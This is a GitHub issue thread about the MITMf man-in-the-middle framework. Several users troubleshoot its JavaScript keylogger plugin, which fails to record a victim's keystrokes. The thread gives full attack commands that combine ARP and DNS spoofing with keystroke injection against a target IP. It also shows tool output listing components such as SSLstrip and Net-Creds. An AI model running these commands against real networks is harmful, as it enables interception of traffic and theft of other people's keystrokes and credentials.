### ISSUE TITLE
JS Keylogger Not Recording Keystrokes

### ISSUE THREAD

**Issue by 0x42424242** [byt3bl33d3r/MITMf#70]
Firstly I want to say thanks for an awesome job with this project. It's great to see active development on some MitM stuff. 

I tested out the javascript keylogging with the following command...
```
mitmf --spoof --arp -i eth0 --gateway 192.168.3.1 --target 192.168.3.137 --jskeylogger
```
I could successfully see the requests being poisoned along with 'Malicious html injects' for the majority of pages. I tested this out on slashdot.org as seen in the tutorial here - http://sign0f4.blogspot.com.au/2014/07/introducing-mitmf-framework-for-man-in.html. Typing in the search bar gave no indication on the attacking machine of any typing at all. 

I'm happy to provide more info if it helps you. 

```
Attacking OS: Kali
Version: mitmf 0.9
```
```
Victim OS: OSX
Browser: Firefox 37.0
Site: slashdot.org
```

Cheers.

**Comment by byt3bl33d3r** [comment]
@0x42424242 probably same as #71, if this persists even after getting the new version let me know and I'll re-open the issue.
Thanks

**Comment by chaitanyakrishna** [comment]
@byt3bl33d3r I just installed mitmf directly from kali repo.Can't run jskeylogger.

Traceback (most recent call last):
  File "./mitmf.py", line 180, in <module>
    from core.protocols.smb.SMBserver import SMBserver
  File "/usr/share/mitmf/core/protocols/smb/SMBserver.py", line 5, in <module>
    from impacket import version, smbserver, LOG
ImportError: cannot import name LOG

**Comment by daw1012345** [comment]
Don't download MITMf from kali repo. It's deprecated and has dependencies issues.Refer to the Wiki to download the latest version.

**Comment by hephzibah** [comment]
Goodo day......please i need your help 
 
please i want to know what to do am using kali 2016 rolling version, and a windows 64bit  both on vmware.  am trying the MITMF attack sing the following commands 
 
mitmf -i eth0 --arp --dns --spoof --gateway(my gateway) --target(my targets ip) --jskeylogger 
 
every thing seems working well because this is the output that comes  after the command 
 
 
[*] MITMf v0.9.8 - 'The Dark Side'
|_ Spoof v0.6
|  |_ DNS spoofing enabled
|  |_ ARP spoofing enabled
|_ JSKeylogger v0.2
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ Net-Creds v1.0 online
|_ MITMf-API online
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online

but when i start some search in the victims machines  i do not get any sessions or keystrokes noting at all.
so what can i do.....am very sure the ip address are very correct because i check them very every well
 
  pls how do i solve this ?
